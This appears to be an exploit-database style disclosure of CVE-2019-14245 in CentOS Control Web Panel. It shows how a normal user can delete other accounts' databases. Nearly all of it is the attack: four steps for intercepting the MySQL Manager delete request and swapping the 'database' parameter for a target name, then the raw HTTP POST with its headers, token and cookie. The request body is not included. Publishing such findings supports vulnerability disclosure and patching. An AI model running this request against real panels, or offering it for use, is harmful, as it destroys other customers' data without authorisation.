Exploit Title : CWP (CentOS Control Web Panel) Arbitrary database dropping  
Date : 24 Jul 2019  
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
Vendor Homepage :  
Software Link : Not available, user panel only available for lastest version  
Version :  
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)  
CVE-Number : CVE-2019-14245  
Reference :  
1. Log in as a normal user.  
2. Go to "MySQL Manager"  
3. Try to delete any database from the account  
4. Intercept the request, and modify parameter "database" to target database name such as "oauthv2"  
POST /cwp_226727d95b77d953/alice/alice/index.php?module=mysql_manager&acc=deletedatabase HTTP/1.1  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: 9a1f7869d43544fc9f509cb6ac7bf430  
X-Requested-With: XMLHttpRequest  
Content-Length: 20  
Connection: close  
Cookie: PHPSESSID=i2is5am08ru7a2h93e13llp9e2